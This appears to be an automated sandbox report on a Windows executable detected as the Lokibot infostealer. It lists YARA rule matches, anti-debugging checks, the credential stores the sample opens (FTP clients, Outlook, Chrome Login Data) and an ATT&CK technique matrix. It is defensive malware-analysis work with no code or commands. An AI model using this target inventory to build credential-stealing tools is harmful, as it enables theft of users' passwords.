                      Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000000.00000000.359525035.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: Process Memory Space: wi7zJOZT2r.exe PID: 7088, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: 0_2_0040549C0_2_0040549C
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: 0_2_004029D40_2_004029D4
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: String function: 0041219C appears 45 times
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: String function: 00405B6F appears 41 times
                      Source: wi7zJOZT2r.exeReversingLabs: Detection: 100%
                      Source: wi7zJOZT2r.exeVirustotal: Detection: 88%
                      Source: wi7zJOZT2r.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: 0_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,0_2_0040650A
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/2@7/2
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: 0_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,0_2_0040434D
                      Source: wi7zJOZT2r.exe, 00000000.00000003.359825362.0000000000557000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

                      Data Obfuscation

                      barindex
                      Source: Yara matchFile source: wi7zJOZT2r.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: wi7zJOZT2r.exe PID: 7088, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: 0_2_00402AC0 push eax; ret 0_2_00402AD4
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: 0_2_00402AC0 push eax; ret 0_2_00402AFC
                      Source: wi7zJOZT2r.exeStatic PE information: section name: .x
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exe TID: 7076Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,0_2_00403D74
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeThread delayed: delay time: 60000Jump to behavior
                      Source: wi7zJOZT2r.exe, 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: 0_2_00402B7C GetProcessHeap,RtlAllocateHeap,0_2_00402B7C
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: 0_2_0040317B mov eax, dword ptr fs:[00000030h]0_2_0040317B
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: 0_2_00406069 GetUserNameW,0_2_00406069

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 00000000.00000002.368819944.0000000002984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: wi7zJOZT2r.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: wi7zJOZT2r.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: PopPassword0_2_0040D069
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: SmtpPassword0_2_0040D069
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: Yara matchFile source: wi7zJOZT2r.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 00000000.00000002.368819944.0000000002984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: wi7zJOZT2r.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: wi7zJOZT2r.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management InstrumentationPath Interception1
                      Access Token Manipulation
                      1
                      Masquerading
                      2
                      OS Credential Dumping
                      21
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      Exfiltration Over Other Network Medium1
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
                      Virtualization/Sandbox Evasion
                      1
                      Input Capture
                      21
                      Virtualization/Sandbox Evasion
                      Remote Desktop Protocol1
                      Input Capture
                      Exfiltration Over Bluetooth1
                      Ingress Tool Transfer
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                      Access Token Manipulation
                      2
                      Credentials in Registry
                      1
                      Account Discovery
                      SMB/Windows Admin Shares1
                      Archive Collected Data
                      Automated Exfiltration2
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Deobfuscate/Decode Files or Information
                      NTDS1
                      System Owner/User Discovery
                      Distributed Component Object Model2
                      Data from Local System
                      Scheduled Transfer112
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                      Obfuscated Files or Information
                      LSA Secrets1
                      Remote System Discovery
